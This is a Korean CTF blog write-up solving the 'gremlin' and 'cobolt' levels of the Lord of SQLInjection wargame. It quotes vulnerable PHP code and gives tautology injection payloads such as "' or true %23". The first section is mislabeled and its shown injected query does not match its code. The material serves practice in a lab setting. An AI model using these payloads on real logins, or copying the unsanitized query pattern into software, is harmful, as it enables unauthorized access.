[LOS] gremlin 풀이

 

PHP & query 

<?php
  include "./config.php"; 
  login_chk();
  $db = dbconnect();
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~"); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  $query = "select id from prob_cobolt where id='{$_GET[id]}' and pw=md5('{$_GET[pw]}')"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id'] == 'admin') solve("cobolt");
  elseif($result['id']) echo "<h2>Hello {$result['id']}<br>You are not admin :(</h2>"; 
  highlight_file(__FILE__); 
?>
select id from prob_cobolt where id='' and pw=md5('')

 

문제 풀이

더보기

solve 조건

if($result['id'] == 'admin') solve("cobolt");

 id값이 admin 이여야한다

 

특수문자 제약

 if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~"); 
 if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");

[prob, _ ,.\] 문자들이 필터링 된다 해당 문자들을 제외하고 sql 인젝션을 시도한다.

 

sqlInjection 쿼리

 $query = "select id from prob_cobolt where id='{$_GET[id]}' and pw=md5('{$_GET[pw]}')"; 

 id값만 admin으로 넣어주고 뒤에는 주석처리 하면 될것같다.

 

 

URL

?id= admin& pw=' or true %23 

 

 

Injection 결과

select id from prob_gremlin where id=' admin' and pw='' or true #

 

 

 

 

 

 

 

'CTF > LOS' 카테고리의 다른 글

[LOS] darkelf 풀이 - 6번  (0) 2020.09.15
[LOS] wolfman 풀이 - 5번  (0) 2020.09.15
[LOS] orc 풀이 - 4번  (0) 2020.09.15
[LOS] goblin 풀이 3번  (0) 2020.09.15
[LOS] gremlin 풀이 - 1번  (0) 2020.09.15

[LOS] gremlin 풀이

 

PHP & query 

<?php
  include "./config.php";
  login_chk();
  $db = dbconnect();
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~"); // do not try to attack another table, database!
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
  $query = "select id from prob_gremlin where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if($result['id']) solve("gremlin");
  highlight_file(__FILE__);
?>
select id from prob_gremlin where id='' and pw=''

 

문제 풀이

더보기

solve 조건

  if($result['id']) solve("gremlin");

id값이 있기만하면 문제가 해결된다.

 

특수문자 제약

 if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~"); 
 if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");

[prob, _ ,.\] 문자들이 필터링 된다 해당 문자들을 제외하고 sql 인젝션을 시도한다.

 

sqlInjection 쿼리

select id from prob_gremlin where id='' and pw='' or true #'

 형태로 공격을 시도 할 것이다.

 해당 php는 get형식으로 쿼리를 받고있어 sql 인젝션이 가능하다.

 

 

URL

los.rubiya.kr/chall/gremlin_280c5552de8b681110e9287421b834fd.php?pw=' or true %23 

 

 

Injection 결과

select id from prob_gremlin where id='' and pw='' or true #

 

 

#이 주석역활을 하기 때문에 SQL에서는

select id from prob_gremlin where id='' and pw='' or true 으로 인식한다.

 

 

 

 

 

'CTF > LOS' 카테고리의 다른 글

[LOS] darkelf 풀이 - 6번  (0) 2020.09.15
[LOS] wolfman 풀이 - 5번  (0) 2020.09.15
[LOS] orc 풀이 - 4번  (0) 2020.09.15
[LOS] goblin 풀이 3번  (0) 2020.09.15
[LOS] cobolt 풀이 - 2번  (0) 2020.09.15

+ Recent posts